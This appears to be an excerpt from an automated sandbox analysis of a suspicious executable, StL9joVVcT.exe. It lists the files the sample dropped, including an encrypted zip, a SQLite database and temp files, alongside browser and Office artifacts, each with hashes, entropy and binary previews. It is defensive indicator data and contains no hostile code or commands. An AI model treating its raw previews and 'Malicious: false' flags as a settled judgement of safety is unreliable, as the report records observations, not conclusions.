                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):95768
                                                                                                                                                                                                                Entropy (8bit):7.998161923112195
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:1536:oKYaciEsOj+MMkRLSgT8hGSwKGw2rjFtA02JUIVZR/4xg34mPQ+RyH:/YJJj+M/RLDvKGVHFtp2SOH4q34mHoH
                                                                                                                                                                                                                MD5:E8F34E325EB3F2EBA24CD93415121D2E
                                                                                                                                                                                                                SHA1:15EDB039F2A2FDD4F8DFBBBCF5FF9B24847DB803
                                                                                                                                                                                                                SHA-256:C98A276681E4A6373B5E8F10E7F6BB5EA4BB90D59E34D1214BF1E3FA0B9E665B
                                                                                                                                                                                                                SHA-512:A7CE67227FE188E7B961B81732A5C2298CECA20A5BAD52F1A3DB4AF0251BA6B6257BB49AB979CE16FA5724CAB5679AD1C2CE7C628946BA33E867AAC06665AB78
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:PK..-......6.Z.8n~............D/hwcompat.txt.....x......Zu.......Jc.=..w..%"....Q&d......G..a....J.2.d.....n.....%.j'..<^....z..{?xm,....Z.S"R:.....B.-.i.8dT.r.1.5.;H..X..].....q..D..>8_.>..n...%.....P...v.SB...q."._...UQ..q9.#..t...C...T..b*=J...2nB...V..>.+.....%.h5P..X......"/._. SD....151.#..l/.=.=D..Q.....A"..7.......M.Q.y.r1o.By)..{G;...b..1.q..'..u K.+.fN.`.2..P...h.E.e^+..s...!....~L..`..`K2fY)j4..q..l..(.7(.+.^.1.0q.......lx...e....y.[.%.$6.h....v..#W..M.).j8.;O.......9Q2...0EWb...9../0.8./...........+.n..;.j.8&..>o>).......Y.....'...+}zb...a......H.-....!M.>.k..8E>..!...p>H...0"2NEw....v.....0.6.."L..O.5...PJ!...#......T......A.&E.........R..........|.\....L\..C.....&.tM..4....I..B..}1...}.<.h+...f.%^.{.;.S..g...rR1. .B......{..D..3.c..'Qq..Z......P..nB.....B2.A;..4.KmH...Y...>.(S.. @-m_..........][\...p.p.P...-.N..!..;2..o.M.*...Th?.z.Ep.W.%.....D..+..E%'.......+...s...-...]..o....".J.h..."..S...[....U......=......2'.(...l...C7v[1.

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                Entropy (8bit):4.105637406271287
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHglt:o1cUh4Y3LbO/BVsJDbYuDRBOyc/
                                                                                                                                                                                                                MD5:DC41CF25F0BDDA3ABA274B6BC64147DC
                                                                                                                                                                                                                SHA1:9F4D1379C944E6FC2FB912B89527193E1E1F4177
                                                                                                                                                                                                                SHA-256:8A190FE3DDBCF216F41A690A55DF92576D410F050818FFB476125A4EC6CF52ED
                                                                                                                                                                                                                SHA-512:91481621424973E0B4340ADE1B84402B24FE9F705A63D7044DD0B7BBC416E27F22684F4AB39EC4C7C8A13829A07BBA8B9B1576E820D23424804C0DE837F0FB17
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\DevToolsActivePort

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                Size (bytes):59
                                                                                                                                                                                                                Entropy (8bit):4.397071176620407
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:mJKB2sSuy28V/REIKG5G9D:mot5/8Vhd5G9D
                                                                                                                                                                                                                MD5:28B4A103A10BC13F027E6EBBBDADBE26
                                                                                                                                                                                                                SHA1:9227C7BF4190B245A7496CDADDA71620A30F705B
                                                                                                                                                                                                                SHA-256:28B52CD590AF6FF0684C9A5E8F0A57DA95BFF69E77CEE5BD4653F35F825303B1
                                                                                                                                                                                                                SHA-512:2C2D44255AAEE8116E7813792C88A664BA8C53866A4BC7CD2F085BC0AA741DF67EED95E11FED02EE499DD72A375390EBB1F49BCB9E1B9A6ACAC19E7FECBC6F2A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:9286./devtools/browser/92c19479-0211-4a2a-a653-16c0656541c1

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\mso50C1.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):663
                                                                                                                                                                                                                Entropy (8bit):5.949125862393289
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                                                                                                MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                                                                                                SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                                                                                                SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                                                                                                                SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp0ezlhx.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1075), with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1075
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk3:Yh
                                                                                                                                                                                                                MD5:036619AC03F1D28AA4FBF72202C220A1
                                                                                                                                                                                                                SHA1:888EEB60A5424BE6DDCC4380B2E4E0579A432186
                                                                                                                                                                                                                SHA-256:B5061FAEC76214F59C308E7FC343AE998F0704BFEF2E70E0D69BAEC9141C8C23
                                                                                                                                                                                                                SHA-512:41F3C8CDA59742EA3474E0C2A2511213BE313BF5B0EC0EFA6B0303582DC37731F952FF4AEA3E55953DC8C5F368937946F5EF398795C0CB5D16612F08A91B3B6D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpcvkpp3.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1115), with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1115
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkP:Y5
                                                                                                                                                                                                                MD5:6E8D259DAABF1168AE5136A3DE48EE80
                                                                                                                                                                                                                SHA1:B015257E3AE0810DDBDA53C0B12991161A863FFB
                                                                                                                                                                                                                SHA-256:13370A65CA7E31FBF3A133156C208BF99C01A54880D55A8A4500495683E3A47F
                                                                                                                                                                                                                SHA-512:CF3C564C18C6B0965A431CDA1ED8FA97CBEEB839D992E48F77C073BC8054EAD03B4823DF381C5179D3D398877DA3473B92D70AE905A2BD0C7E5FC45505340113
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmplss0xh.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2320), with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2320
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkA:Y+
                                                                                                                                                                                                                MD5:B121C66A26976F857DECDF63D4AC5760
                                                                                                                                                                                                                SHA1:BB735F74CAC033C169FEC7E2ADEAE29D9298DEF3
                                                                                                                                                                                                                SHA-256:9FA9338238545362E67ED293C95A1C9E06E9A0D9D60955AA27D51C6E386E23DB
                                                                                                                                                                                                                SHA-512:0BE6EF27DDB57208A3F17288983017AEA1BC2F85D9F2D2009E8ABAC59DFF511685F09B240D20BB73CF9CC8755C0DB9A17B440A69D5705739829A8A20444E3CFE
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpmxl14l.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4016), with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4016
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkg:Ye
                                                                                                                                                                                                                MD5:C10A33BC4BC222F732A5EAE70559103F
                                                                                                                                                                                                                SHA1:0AF1B0D3CAF24258A8A1F8B3A777E1054FE4F6B7
                                                                                                                                                                                                                SHA-256:130F7D29EF62A476973661C53E37C1E33337BCAA321A27343C1C75F7C07C9EDB
                                                                                                                                                                                                                SHA-512:C6443B647C5F3E1F481D764E406DC018F292448CDDD6E147E3D7FCDDDA28D996745585DC9C25130353DEB7DEA44A70E1EAAF9D747DC55E4F77C7712016CAF573
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpon2qcj.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpr4nns3.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2898), with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2898
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkS:YA
                                                                                                                                                                                                                MD5:6C3C365590F1D67AB1B9C99BC919655D
                                                                                                                                                                                                                SHA1:E3C0A8761FEC3C75FFE106A17F40ECEA65CA3C19
                                                                                                                                                                                                                SHA-256:59314FFF62F4FC4EF9E371E3028F1841DB3623EAF3669E059AF64A891776B26C
                                                                                                                                                                                                                SHA-512:DDA2FEDEB9B60013768577F8437B9B6EF6EA94A412EBF44944D16232E513AD78368E6315525BF37C0BF43ECD53B5E73C2056870779298A1BD9F7E276CB2571F1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmps0ptin.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1395), with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1395
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk3:Yh
                                                                                                                                                                                                                MD5:BEAB4F4DCF413E7B9C7208EABD1A24E0
                                                                                                                                                                                                                SHA1:4A58E11CA95B314A7639F769F07147D50EA3D2F6
                                                                                                                                                                                                                SHA-256:B8C239BE174A4FC4949E6650A6BAA66F150E0573D2DDCD043173436982FC153A
                                                                                                                                                                                                                SHA-512:DA361196FB6F752F60FD801A3B2BC242BBD60429BCA4749C99B7A2FDB47D63347C27CE142D6F70847144D8C4A38FE6528EC277F6FC5BBDA95F64DE194257CABD
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpswrwce.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2401), with no line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2401
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx:YL
                                                                                                                                                                                                                MD5:998AC6515EA5AB25E749AC67C4FA9D21
                                                                                                                                                                                                                SHA1:A956BB285AEBCF74BD7A90DA95581766F2FD0E85
                                                                                                                                                                                                                SHA-256:295B97E5BA6A6DAA6259055519FC0D05C4BE163A9B274D735796BC07D84DB058
                                                                                                                                                                                                                SHA-512:B83D6809AB00C041AB994951D1C96E2063A125C541679E76FE21E859848E2288F8253B02085EA9558B7A8A69539AF21B48585AC1869302E916853E827432B273
                                                                                                                                                                                                                Malicious:false
